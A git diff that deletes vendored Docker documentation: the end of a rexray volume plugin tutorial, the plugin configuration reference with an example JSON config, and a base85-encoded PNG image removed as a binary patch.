also be set. - -## 4. Create plugin - -`docker plugin create tiborvass/rexray-plugin "$TMPDIR"` will create the plugin. 
- -```sh -$ docker plugin ls -ID NAME DESCRIPTION ENABLED -2475a4bd0ca5 tiborvass/rexray-plugin:latest A rexray volume plugin for Docker false -``` - -## 5. Test plugin - -```sh -$ docker plugin set tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY` -$ docker plugin enable tiborvass/rexray-plugin -$ docker volume create -d tiborvass/rexray-plugin my-ebs-volume -$ docker volume ls -DRIVER VOLUME NAME -tiborvass/rexray-plugin:latest my-ebs-volume -$ docker run --rm -v my-ebs-volume:/volume busybox sh -c 'echo bye > /volume/hi' -$ docker run --rm -v my-ebs-volume:/volume busybox cat /volume/hi -bye -``` - -## 6. Push plugin - -First, ensure you are logged in with `docker login`. Then you can run: -`docker plugin push tiborvass/rexray-plugin` to push it like a regular docker -image to a registry, to make it available for others to install via -`docker plugin install tiborvass/rexray-plugin EBS_ACCESSKEY=$AWS_ACCESSKEY EBS_SECRETKEY=$AWS_SECRETKEY`. diff --git a/vendor/github.com/docker/docker/docs/extend/config.md b/vendor/github.com/docker/docker/docs/extend/config.md deleted file mode 100644 index 096d2d0822..0000000000 --- a/vendor/github.com/docker/docker/docs/extend/config.md +++ /dev/null @@ -1,225 +0,0 @@ ---- -title: "Plugin config" -description: "How develop and use a plugin with the managed plugin system" -keywords: "API, Usage, plugins, documentation, developer" ---- - - - - -# Plugin Config Version 1 of Plugin V2 - -This document outlines the format of the V0 plugin configuration. The plugin -config described herein was introduced in the Docker daemon in the [v1.12.0 -release](https://github.com/docker/docker/commit/f37117045c5398fd3dca8016ea8ca0cb47e7312b). - -Plugin configs describe the various constituents of a docker plugin. 
Plugin -configs can be serialized to JSON format with the following media types: - -Config Type | Media Type -------------- | ------------- -config | "application/vnd.docker.plugin.v1+json" - - -## *Config* Field Descriptions - -Config provides the base accessible fields for working with V0 plugin format - in the registry. - -- **`description`** *string* - - description of the plugin - -- **`documentation`** *string* - - link to the documentation about the plugin - -- **`interface`** *PluginInterface* - - interface implemented by the plugins, struct consisting of the following fields - - - **`types`** *string array* - - types indicate what interface(s) the plugin currently implements. - - currently supported: - - - **docker.volumedriver/1.0** - - - **docker.authz/1.0** - - - **`socket`** *string* - - socket is the name of the socket the engine should use to communicate with the plugins. - the socket will be created in `/run/docker/plugins`. - - -- **`entrypoint`** *string array* - - entrypoint of the plugin, see [`ENTRYPOINT`](../reference/builder.md#entrypoint) - -- **`workdir`** *string* - - workdir of the plugin, see [`WORKDIR`](../reference/builder.md#workdir) - -- **`network`** *PluginNetwork* - - network of the plugin, struct consisting of the following fields - - - **`type`** *string* - - network type. - - currently supported: - - - **bridge** - - **host** - - **none** - -- **`mounts`** *PluginMount array* - - mount of the plugin, struct consisting of the following fields, see [`MOUNTS`](https://github.com/opencontainers/runtime-spec/blob/master/config.md#mounts) - - - **`name`** *string* - - name of the mount. - - - **`description`** *string* - - description of the mount. - - - **`source`** *string* - - source of the mount. - - - **`destination`** *string* - - destination of the mount. - - - **`type`** *string* - - mount type. - - - **`options`** *string array* - - options of the mount. 
- -- **`propagatedMount`** *string* - - path to be mounted as rshared, so that mounts under that path are visible to docker. This is useful for volume plugins. - This path will be bind-mounted outisde of the plugin rootfs so it's contents - are preserved on upgrade. - -- **`env`** *PluginEnv array* - - env of the plugin, struct consisting of the following fields - - - **`name`** *string* - - name of the env. - - - **`description`** *string* - - description of the env. - - - **`value`** *string* - - value of the env. - -- **`args`** *PluginArgs* - - args of the plugin, struct consisting of the following fields - - - **`name`** *string* - - name of the args. - - - **`description`** *string* - - description of the args. - - - **`value`** *string array* - - values of the args. - -- **`linux`** *PluginLinux* - - - **`capabilities`** *string array* - - capabilities of the plugin (*Linux only*), see list [`here`](https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md#security) - - - **`allowAllDevices`** *boolean* - - If `/dev` is bind mounted from the host, and allowAllDevices is set to true, the plugin will have `rwm` access to all devices on the host. - - - **`devices`** *PluginDevice array* - - device of the plugin, (*Linux only*), struct consisting of the following fields, see [`DEVICES`](https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#devices) - - - **`name`** *string* - - name of the device. - - - **`description`** *string* - - description of the device. - - - **`path`** *string* - - path of the device. 
- -## Example Config - -*Example showing the 'tiborvass/sample-volume-plugin' plugin config.* - -```json -{ - "Args": { - "Description": "", - "Name": "", - "Settable": null, - "Value": null - }, - "Description": "A sample volume plugin for Docker", - "Documentation": "https://docs.docker.com/engine/extend/plugins/", - "Entrypoint": [ - "/usr/bin/sample-volume-plugin", - "/data" - ], - "Env": [ - { - "Description": "", - "Name": "DEBUG", - "Settable": [ - "value" - ], - "Value": "0" - } - ], - "Interface": { - "Socket": "plugin.sock", - "Types": [ - "docker.volumedriver/1.0" - ] - }, - "Linux": { - "Capabilities": null, - "AllowAllDevices": false, - "Devices": null - }, - "Mounts": null, - "Network": { - "Type": "" - }, - "PropagatedMount": "/data", - "User": {}, - "Workdir": "" -} -``` diff --git a/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png b/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png deleted file mode 100644 index 1a6a6d01d2048fcb975b7d2b025cdfabd4c4f5f3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 45916 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 
